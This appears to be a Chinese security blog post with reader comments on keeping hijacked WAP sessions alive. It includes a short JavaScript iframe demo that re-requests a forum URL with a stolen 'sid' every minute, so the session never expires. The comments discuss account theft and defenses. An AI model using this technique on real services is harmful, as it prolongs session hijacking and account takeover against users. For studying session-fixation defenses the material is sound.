WAP网站下的session保持

再谈一下session保持,由于session总是会过期的,需要一直有人刷新才行。还记得cnqing写的那个session保持工具,其实攻击wap不需要保持真正的session,要的是sid。我们只要下面一段javascript代码,就可以一直保持这个sid了。原理还是wap验证使用的是sid,而不是session,所以只要1分钟内发一个get请求,带上sid就好。

DEMO

 

  1. <script> 
  2. //下面是要保持session的地址。 
  3. var url=" http://bbs.ecshop.com/wap/index.php?sid=1oALS7"
  4.  
  5. window.setInterval("keepsid()", 60000); 
  6.  
  7. function keepsid(){ 
  8.     document.getElementById("iframe1").src=url+"&time="+Math.random(); 
  9. </script> 
  10. <iframe id="iframe1" src=""></iframe> 

以上代码只要保存为htm文件用浏览器打开就好。你甚至可以一个页面上NiframeNsid,同时保持着,它们可以是不同的sid

image002.jpg

 

发表评论?

4 条评论。

  1. 就是因为session持久,才会造成一些攻击者盗号成功后,受害者修改密码后也没办法:(

    不过针对你这种的,可以用我的方法一定的机率干掉:

    browser ddos 在业务中的应用:http://www.woyigui.cn/2010/11/03/browser-ddos-applications/

  2. 见识了!弱弱问下,如果服务端设置了Session的有效期呢?一般来说控制用户身份不外就是Cookie和Session两种方式,可否Session+Cookie来验证用户呢?不知这样是否能够有效对抗XSS

  3. 如果服务端设置了Session的有效期呢?
    答:如果你是指,一段时间以后,无论用户是否仍在请求,服务端都强制过期当前session,把用户踢下线。那也就可以防御了。不过太变态了,用户体验部会找你拼命的。
    一般来说控制用户身份不外就是Cookie和Session两种方式,可否Session+Cookie来验证用户呢?不知这样是否能够有效对抗XSS
    答:无法对抗XSS,具体请google搜索“XSS防御”。

  4. 不太明白这个session的设置

发表评论